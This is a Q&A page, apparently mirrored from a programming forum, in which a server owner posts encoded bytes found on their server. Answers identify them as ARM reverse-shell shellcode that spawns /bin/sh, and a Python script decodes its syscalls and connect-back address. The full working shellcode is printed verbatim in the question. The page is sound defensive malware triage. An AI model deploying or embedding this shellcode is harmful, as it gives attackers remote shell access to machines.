
Cannot decode shellcode found on my server

Today I was blown away by the slowness of my website, so I decided to look at what was wrong. I looked at apache2, server bandwidth and incorrect configs, but couldn't find anything. So on a whim I opened a random file I didn't know existed; at least, I didn't put it there.

This is the code I found in the file:

\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde

Can anyone push me in the right direction? It looks like some malicious shellcode. I've tried to decode it but couldn't figure out how it was encoded.

Thanks!

I have tried ASCII to text, binary to text, and base64 to text. The only useful bit of text I found was /bin/ when I tried decoding it from ASCII to text.

It seems to be an ARM reverse-shell /bin/sh shellcode.

Analysis

If the first nibble of every fourth byte is "e", then it is likely to be ARM code. This is because of conditional execution (always execute). In this case, the fourth and eighth bytes are e2 and e1.

To convert into an ELF file and look at the disassembly you can do:

$ arm-none-eabi-objcopy -I binary -O elf32-littlearm data.bin data.elf
$ arm-none-eabi-objdump -D data.elf

The first two instructions are in ARM mode and jump into Thumb mode starting at address 8.

   0:   e28f1001        add     r1, pc, #1
   4:   e12fff11        bx      r1

You can look at the Thumb code with

arm-none-eabi-objdump -M force-thumb -D data.elf

The Thumb code then issues some syscalls and modifies itself to patch null bytes and add some obfuscation, to make our life harder.

I searched for the syscalls and some of the constants and found this: https://packetstormsecurity.com/files/151392/Linux-ARM-Reverse-Shell-Shellcode.html. Not exactly the same, but very similar. The code you provided has some obfuscation added, and the IP address/port changed.
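As an added example (not part of the original answer, and not the asker's file or the Packet Storm code), the script below does the checks the answer describes without binutils: the condition-nibble heuristic on the first words, decoding the `add r1, pc, #1 ; bx r1` trampoline to find the Thumb entry, and a linear walk of the Thumb halfwords that tracks immediate values in r0-r7 so each `svc` can be labelled with the syscall number sitting in r7. It also replays the byte and halfword stores the code makes to itself, which is what turns the `\xff\xff` placeholder into a `sockaddr_in` family field and NUL-terminates `/bin/sh`, so the connect-back address and port fall out of the patched image rather than having to be read around the obfuscation by hand. Assumptions: Linux ARM EABI syscall numbers (socket 281, connect 283, dup2 63, execve 11, exit 1), only the Thumb-16 encodings this sample uses are decoded, and branches are not followed; any other instruction clears the tracked registers so the script reports `?` instead of guessing. The byte string is the one copied from the question.

```python
import re
import struct

# The string from the question, copied verbatim (raw string keeps the \x escapes).
POSTED = (
    r"\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02"
    r"\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c"
    r"\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf"
    r"\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde"
)
SYSCALLS = {1: "exit", 11: "execve", 63: "dup2", 281: "socket", 283: "connect"}  # Linux ARM EABI

def unescape(text):
    """Turn the '\\xNN' text found in the file into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))

def arm_condition_nibbles(data, nwords=2):
    """Top nibble of each little-endian 32-bit word is the ARM condition field; 0xE means 'always'."""
    return [struct.unpack_from("<I", data, 4 * i)[0] >> 28 for i in range(nwords)]

def thumb_entry(data):
    """Decode the 'add r1, pc, #imm ; bx r1' trampoline at offset 0 into the Thumb entry offset."""
    w0, w1 = struct.unpack_from("<II", data, 0)
    if (w0 & 0xFFFFF000) != 0xE28F1000 or w1 != 0xE12FFF11:
        return None
    imm8, rot = w0 & 0xFF, 2 * ((w0 >> 8) & 0xF)                         # ARM rotated immediate
    target = 8 + (((imm8 >> rot) | (imm8 << (32 - rot))) & 0xFFFFFFFF)  # PC reads as address + 8
    return target & ~1 if target & 1 else None                          # bit 0 set: bx enters Thumb

def trace_thumb(data, entry):
    """Walk Thumb-16 halfwords linearly from `entry`, tracking constants in r0-r7 and replaying
    the code's own byte/halfword stores. Branches are not followed; an undecoded instruction
    drops all register knowledge. Returns (syscall records, self-patched image)."""
    mem, regs, calls = bytearray(data), [None] * 8, []
    for off in range(entry, len(mem) - 1, 2):
        hw = struct.unpack_from("<H", mem, off)[0]
        rd, rs, rb = hw & 7, (hw >> 3) & 7, (hw >> 8) & 7
        if hw >> 8 == 0xDF:                                    # svc #imm: record r7 and r0-r3
            calls.append((off, SYSCALLS.get(regs[7], "?"), regs[:4]))
            regs[0] = None                                     # return value clobbers r0
        elif hw >> 13 == 0b001:                                # movs/cmp/adds/subs rd, #imm8
            op, imm, cur = (hw >> 11) & 3, hw & 0xFF, regs[rb]
            if op == 0:
                regs[rb] = imm
            elif op in (2, 3):
                regs[rb] = None if cur is None else (cur + imm if op == 2 else cur - imm) & 0xFFFFFFFF
        elif hw >> 11 == 0b00011:                              # adds/subs rd, rs, rn|#imm3
            n = (hw >> 6) & 7
            other = n if hw & 0x400 else regs[n]
            if regs[rs] is None or other is None:
                regs[rd] = None
            else:
                regs[rd] = (regs[rs] - other if hw & 0x200 else regs[rs] + other) & 0xFFFFFFFF
        elif hw >> 13 == 0b000:                                # lsls/lsrs rd, rs, #imm5 (asrs -> unknown)
            op, sh, cur = (hw >> 11) & 3, (hw >> 6) & 0x1F, regs[rs]
            regs[rd] = None if cur is None or op == 2 else (cur << sh if op == 0 else cur >> sh) & 0xFFFFFFFF
        elif hw >> 11 == 0b10100:                              # adr rd, label: Align(pc, 4) + imm8*4
            regs[rb] = ((off + 4) & ~3) + (hw & 0xFF) * 4
        elif hw >> 13 == 0b011 or hw >> 12 == 0b1000:          # ldr/str word|byte|halfword [rs, #imm]
            size = 2 if hw >> 12 == 0b1000 else 1 if hw & 0x1000 else 4
            addr = None if regs[rs] is None else regs[rs] + ((hw >> 6) & 0x1F) * size
            if addr is None or addr + size > len(mem):         # not inside the blob: unknown / lost
                if hw & 0x800:
                    regs[rd] = None
            elif hw & 0x800:                                   # load from the (possibly patched) blob
                regs[rd] = int.from_bytes(mem[addr:addr + size], "little")
            elif regs[rd] is not None:                         # store of a known value: patch the image
                mem[addr:addr + size] = (regs[rd] & ((1 << 8 * size) - 1)).to_bytes(size, "little")
        elif hw >> 10 == 0b010001:                             # hi-register add/cmp/mov/bx
            if (hw >> 8) & 3 in (0, 2) and not hw & 0x80:      # add/mov into a low register, e.g. mov r1, sp
                regs[rd] = None
        elif hw >> 9 == 0b1011010 or hw >> 12 == 0b1101 or hw >> 11 == 0b11100:
            pass                                               # push, b<cond>, b: no low-register writes
        else:
            regs = [None] * 8
    return calls, bytes(mem)

def sockaddr_in(mem, off):
    """struct sockaddr_in at `off` as (family, port, dotted IPv4); port and IP are big-endian."""
    return (struct.unpack_from("<H", mem, off)[0], struct.unpack_from(">H", mem, off + 2)[0],
            ".".join(str(b) for b in mem[off + 4:off + 8]))

def printable_strings(buf, minlen=4):
    """Runs of printable ASCII, the 'strings' check the asker tried by hand."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % minlen, buf)

def triage(data=None):
    """Whole pipeline on the posted bytes (or any raw blob); returns a dict to assert on."""
    data = unescape(POSTED) if data is None else data
    entry = thumb_entry(data)
    calls, patched = trace_thumb(data, 0 if entry is None else entry)
    conn = next((c for c in calls if c[1] == "connect"), None)
    addr = conn[2][1] if conn else None                        # r1 = pointer to the sockaddr_in
    endpoint = sockaddr_in(patched, addr) if addr is not None and addr + 8 <= len(patched) else None
    return {"cond": arm_condition_nibbles(data), "entry": entry, "calls": calls,
            "endpoint": endpoint, "strings": printable_strings(patched)}
```

`triage()` returns the condition nibbles of the first two words, the Thumb entry offset, one `(offset, syscall, [r0, r1, r2, r3])` record per `svc`, the `sockaddr_in` the `connect` call's r1 points at in the patched image, and the printable strings of that image. On this sample the syscall order socket, connect, dup2, execve is what the answer describes, and the string check only yields a clean `/bin/sh` after the self-patching store has run; on the raw bytes it is `/bin/shX`. The tracker is deliberately conservative: a sample that uses literal-pool or SP-relative loads will show `?` for the syscall, which is the cue to fall back to the objdump route above.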

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address. Any question please contact: yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM